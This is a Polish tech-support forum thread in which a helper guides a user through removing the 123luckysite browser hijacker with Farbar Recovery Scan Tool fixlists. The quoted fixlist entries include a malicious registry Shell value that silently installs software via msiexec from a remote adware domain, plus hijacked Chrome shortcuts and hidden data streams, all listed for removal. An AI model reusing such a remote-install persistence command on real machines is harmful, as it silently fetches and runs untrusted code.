Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

123luckysite.com - nie mogę usunąć z chrome

Perfectholiday 26 Maj 2017 12:34 549 4
  • #1 26 Maj 2017 12:34
    Perfectholiday
    Poziom 6  

    Witam szanownych kolegów i koleżanki.

    Mam problem z komputerem, mianowicie w chrome i innych przeglądarkach jako startowa strona i wyszukiwarka jest 123site. Z informacji które są dostępne w necie, przeskanowałem różnymi programami kompa ( Ccleaner , AdwCleaner, Netia secure) , niestety co pewien czas problem z " 123lucky "pojawia się ponownie. Zrobiłem skan Farbar Recovery Scan Tool, w załączeniu logi. Bardzo proszę o pomoc.

    123luckysite.com - nie mogę usunąć z chrome

    0 4
  • #2 26 Maj 2017 12:50
    Kolobos
    Spec od komputerów

    Pozbadz sie tego F-Secure od Netii, mam nadzieje, ze nie placisz za to badziewie?

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    CloseProcesses:
    Task: {0744F1E4-40BB-48B0-B4B3-AA3738126F72} - System32\Tasks\{2E755AE0-0014-4B0A-B868-526A2797BD4C} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Windows Live\.cache\cb3fe56b1d0dfe507\onedrivesetup.exe" -d "C:\Program Files (x86)\Common Files\Windows Live\.cache\cb3fe56b1d0dfe507" -c C:\Program Files (x86)\Common Files\Windows Live\.cache\cb3fe56b1d0dfe507\onedrivesetup.exe /silent /permachine /silent (dane wartości zawierają 68 znaków więcej).
    Task: {34CAE50C-AE33-443F-86FC-47022E1F5C55} - System32\Tasks\{4083C090-C267-45EF-B4D3-9A74ADBFD229} => pcalua.exe -a C:\Users\SĹ‚awek\Downloads\pobierz_Openoffice_V4.cpl
    Task: {4692BB0E-E3CB-41E5-A421-9F9E2A63DBA9} - \PowerWord-SCT-JT -> Brak pliku <==== UWAGA
    Task: {65311FCF-E9F6-40D3-866A-3A0D79F4E0F3} - System32\Tasks\{5F02709C-8423-46E1-8684-69E4A6570349} => pcalua.exe -a G:\Setup.exe -d G:\
    Task: {AB46FA2A-A2CE-4FBE-8E8B-A28471C6DB3C} - System32\Tasks\{BE1C3D51-2778-40E7-84C5-084F22969F99} => pcalua.exe -a C:\Users\SĹ‚awek\Desktop\Downloads\unetbootin-windows-625.exe -d C:\Users\SĹ‚awek\Desktop\Downloads
    Shortcut: C:\Users\SĹ‚awek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\SĹ‚awek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\SĹ‚awek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.)
    2017-05-24 10:05 - 2017-04-19 06:04 - 02864984 _____ () C:\Program Files (x86)\Cupduck\Application\libglesv2.dll
    2017-05-24 10:05 - 2017-04-19 06:04 - 00087384 _____ () C:\Program Files (x86)\Cupduck\Application\libegl.dll
    - - 00000000 _____ () c:\programdata\package cache\{e01cb7f1-3e88-4450-1764-b3cc1e205c4a}v10.1.14393.795\installers\30daf459e79c5d26366654b1b482e87.cab:dp
    - - 00000000 _____ () C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp
    AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`26hfm [0]
    AlternateDataStreams: C:\Users\SĹ‚awek\Desktop\fv duplikat.jpeg:3or4kl4x13tuuug3Byamue2s4b [87]
    AlternateDataStreams: C:\Users\SĹ‚awek\Desktop\fv duplikat.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]




    AlternateDataStreams: C:\Users\SĹ‚awek\Desktop\skan podzamcze.jpeg:3or4kl4x13tuuug3Byamue2s4b [87]
    AlternateDataStreams: C:\Users\SĹ‚awek\Desktop\skan podzamcze.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
    (Google Inc.) C:\Program Files (x86)\Cupduck\Application\chrome.exe
    HKU\S-1-5-21-153398377-2480230337-2616234735-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1XMTqyNWZXNjk4RjF5FjzYNkY3RWRWMTkxFjH4MdVXMF== /q
    HKU\S-1-5-21-153398377-2480230337-2616234735-1001\...\MountPoints2: H - H:\AutoRun.exe
    HKU\S-1-5-21-153398377-2480230337-2616234735-1001\...\MountPoints2: {265baeee-95d1-11e6-8ef6-0024210ccb67} - H:\AutoRun.exe
    HKU\S-1-5-21-153398377-2480230337-2616234735-1001\...\MountPoints2: {265baefb-95d1-11e6-8ef6-0024210ccb67} - H:\AutoRun.exe
    HKU\S-1-5-21-153398377-2480230337-2616234735-1001\...\MountPoints2: {6e70f75e-891b-11e5-b3ef-0024210ccb67} - H:\AutoRun.exe
    HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2017-03-21] (Microsoft Corporation)
    IFEO\GoogleUpdate.exe: [Debugger]
    IFEO\GoogleUpdaterService.exe: [Debugger]
    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    GroupPolicy: Ograniczenia <======= UWAGA
    CHR Extension: (PDF Viewer) - C:\Users\Sławek\AppData\Local\Google\Chrome\User Data\Default\Extensions\jccchjobcggajhnmckffhcahkkbioifn [2016-06-28]
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [Brak podpisu cyfrowego] <==== UWAGA
    S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X]
    S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X]
    S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X]
    S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
    S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
    S3 VGPU; System32\drivers\rdvgkmd.sys [X]
    2017-05-26 12:00 - 2017-05-26 12:00 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-05-26 09:59 - 2017-05-26 09:59 - 00000000 ____D C:\Program Files (x86)\5927E04E_jumpeasy
    2017-05-25 09:59 - 2017-05-25 09:59 - 00000000 ____D C:\Program Files (x86)\59268EDE_jumpeasy
    2017-05-24 15:37 - 2017-05-24 15:37 - 00000000 ____D C:\Users\Sławek\AppData\Roaming\Cupduck
    2017-05-24 10:06 - 2017-05-24 10:06 - 00000000 ____D C:\Users\Sławek\AppData\Local\Cupduck
    2017-05-24 10:05 - 2017-05-24 10:05 - 00000000 ____D C:\Users\Public\Documents\Google
    2017-05-24 10:05 - 2017-05-24 10:05 - 00000000 ____D C:\Program Files (x86)\Cupduck
    2017-05-24 10:05 - 2017-05-24 10:05 - 00000000 ____D C:\Program Files (x86)\59253EB0_jumpeasy
    2017-05-16 17:02 - 2017-05-26 11:56 - 00000000 ____D C:\AdwCleaner
    2017-05-11 13:44 - 2017-05-11 15:37 - 00000000 _____ C:\Windows\SysWOW64\3333333
    2017-05-11 13:43 - 2017-05-11 15:37 - 00000000 _____ C:\Windows\SysWOW64\22
    2017-05-11 13:43 - 2017-05-11 15:37 - 00000000 _____ C:\Windows\SysWOW64\1111111
    2017-05-11 13:43 - 2017-05-11 15:37 - 00000000 _____ C:\Windows\SysWOW64\00
    2017-05-09 11:55 - 2017-05-12 11:59 - 00000000 _____ C:\Windows\SysWOW64\1111
    2017-05-08 14:01 - 2017-05-16 16:42 - 00000000 ____D C:\Users\Public\Documents\chrome
    2017-05-05 12:14 - 2017-05-18 15:12 - 00000000 ____D C:\Windows\psgo
    2017-05-04 11:56 - 2017-05-16 15:38 - 00000000 ____D C:\Program Files\MK
    2017-05-02 14:42 - 2017-05-16 16:52 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-05-02 14:42 - 2017-05-11 15:37 - 00000000 _____ C:\Windows\SysWOW64\11
    2017-05-02 14:42 - 2017-05-02 14:42 - 00000000 _____ C:\Windows\SysWOW64\33
    2017-04-28 10:00 - 2017-05-16 17:30 - 00000000 ____D C:\Windows\system32\log
    2017-05-13 09:58 - 2016-02-09 14:29 - 00158880 _____ (AVAST Software) C:\Windows\system32\Drivers\aswD727.tmp
    2017-05-10 09:57 - 2016-02-09 14:29 - 00569192 _____ (AVAST Software) C:\Windows\system32\Drivers\aswD540.tmp
    2017-05-10 09:57 - 2016-02-09 14:29 - 00339696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswD5DE.tmp
    2017-05-10 09:57 - 2016-02-09 14:29 - 00128648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswD2BE.tmp
    2017-05-10 09:57 - 2016-02-09 14:29 - 00101152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswCE66.tmp
    2017-05-10 09:57 - 2016-02-09 14:29 - 00075704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswD3F7.tmp
    2017-05-10 09:57 - 2016-02-09 14:29 - 00038296 _____ (AVAST Software) C:\Windows\system32\Drivers\aswD1D2.tmp
    2017-05-10 09:56 - 2017-03-22 11:03 - 00334576 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswC683.tmp
    2017-05-10 09:56 - 2017-03-22 11:03 - 00311808 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswC3C2.tmp
    2017-05-10 09:56 - 2017-03-22 11:03 - 00190256 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswC549.tmp
    2017-05-10 09:56 - 2017-03-22 11:03 - 00049016 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswC839.tmp
    2017-05-10 09:56 - 2016-03-19 10:54 - 00032600 _____ (AVAST Software) C:\Windows\system32\Drivers\aswC992.tmp
    2017-05-10 09:56 - 2016-02-09 14:29 - 01007160 _____ (AVAST Software) C:\Windows\system32\Drivers\aswCC52.tmp
    2015-12-09 17:48 - 2015-12-09 17:48 - 0000000 _____ () C:\Users\Sławek\AppData\Local\BIT7058.tmp
    EmptyTemp:

    W FRST wybierz Napraw.

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0
  • #3 26 Maj 2017 13:14
    Perfectholiday
    Poziom 6  

    Na wstępie dziękuję za szybką pomoc.

    Wykonałem to co napisałeś, podczas naprawy wystąpił problem :
    123luckysite.com - nie mogę usunąć z chrome

    po uruchomieniu chrome, poprosił o zalogowanie do niego, także chyba pomimo błędu naprawa się powiodła. Dla pewności wysyłam ponowne , nowy FRST i Addition, poproszę o sprawdzenie czy wszystko ok?

    EDIT
    Co do Netia secure - mam go gratis na 3 kompy w firmie to chyba niech będzie ?

    Scaliłem. RADU23

    0
  • #4 26 Maj 2017 13:42
    Kolobos
    Spec od komputerów

    Nie, Chrome nadal uruchamia sie z zainfekowanej kopii. Zrob kopie zakladek z Chrome, odinstaluj Chrome.

    Wykonaj nowy Fixlist.txt dla FRST:
    CloseProcesses:
    Shortcut: C:\Users\SĹ‚awek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\FRST\Quarantine\C\Program Files (x86)\Cupduck\Cupduck\Application\chrome.exe (Google Inc.)
    2017-05-26 13:05 - 2017-05-26 13:05 - 00000000 ____D C:\Users\Sławek\AppData\Roaming\Cupduck
    2017-05-26 13:04 - 2017-05-26 13:04 - 00000000 ____D C:\Users\Sławek\AppData\Local\Cupduck

    Usun katalog C:\FRST po wykonaniu i zainstaluj Chrome ponownie. To wszystko.

    0
  • #5 26 Maj 2017 14:51
    Perfectholiday
    Poziom 6  

    Mogę powiedzieć tylko jedno - DZIĘKUJĘ.
    123luckysite.com - nie mogę usunąć z chrome

    0